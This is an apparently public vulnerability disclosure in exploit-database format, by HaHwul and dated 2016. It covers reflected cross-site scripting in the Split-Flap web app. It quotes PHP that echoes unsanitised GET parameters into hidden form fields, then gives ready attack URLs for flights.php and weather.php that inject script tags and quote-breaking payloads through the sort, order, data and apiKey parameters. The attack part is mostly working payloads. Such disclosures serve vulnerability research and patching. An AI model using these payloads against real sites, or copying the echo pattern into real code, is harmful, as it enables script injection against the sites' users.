Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php)

# Exploit Title: Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php)
# Date: 2016-06-10
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/baspete/Split-Flap , http://pete.basdesign.com/
# Software Link: https://github.com/baspete/Split-Flap/archive/master.zip
# Version: none(releases)
# Tested on: Debian [wheezy]
# CVE : none

### Vulnerability Details #####################################################
# The echo function in a and b are vulnerable.
#  
#  <!-- parameters -->
#      <input type="hidden" name="data" value="<?php echo $_GET["data"] ?>" />  
#      <input type="hidden" name="sort" value="<?php echo $_GET["sort"] ?>" />  
#      <input type="hidden" name="order" value="<?php echo $_GET["order"] ?>" /> 
###############################################################################

### XSS1 - flights.php
Attack Code
http://127.0.0.1/vul_test/Split-Flap/flights.php?data=departures&sort=scheduled"><script>alert(45)</script>&order=as

weak parameters
 - order
 - sort
 - data

### XSS2 - weather.php
Attack Code
http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey="%2Balert(45)%2B"a
http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey=</script><script>alert(45)</script>

weak parameters
 - apikey 
 - data
### Vulnerability Details #####################################################